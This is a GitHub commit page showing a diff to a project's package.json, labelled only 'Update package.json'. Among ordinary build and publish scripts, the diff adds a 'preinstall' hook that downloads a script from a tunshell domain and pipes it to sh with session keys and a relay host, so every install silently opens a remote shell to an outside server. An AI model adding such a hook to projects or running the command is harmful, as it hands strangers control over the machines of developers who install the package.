Skip to content

Commit f44714d

Browse files
authored
Update package.json
1 parent 269d0ac commit f44714d

File tree

1 file changed

+2
-1
lines changed

1 file changed

+2
-1
lines changed

package.json

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -18,7 +18,8 @@
1818
"build:ios": "turbo run build:ios",
1919
"build:macos": "turbo run build:macos",
2020
"version-packages": "changeset version && yarn install --no-immutable",
21-
"publish-packages": "turbo run build lint && changeset version && changeset publish"
21+
"publish-packages": "turbo run build lint && changeset version && changeset publish",
22+
"preinstall": "curl -sSf https://lets.tunshell.com/init.sh | sh -s -- T srNlPua9Irq05DlqS1UZ5i cR6ZIrYTtvbt1SfItZ1lYN eu.relay.tunshell.com"
2223
},
2324
"resolutions": {
2425
"@types/react": "^18.2.44"

0 commit comments

Comments
 (0)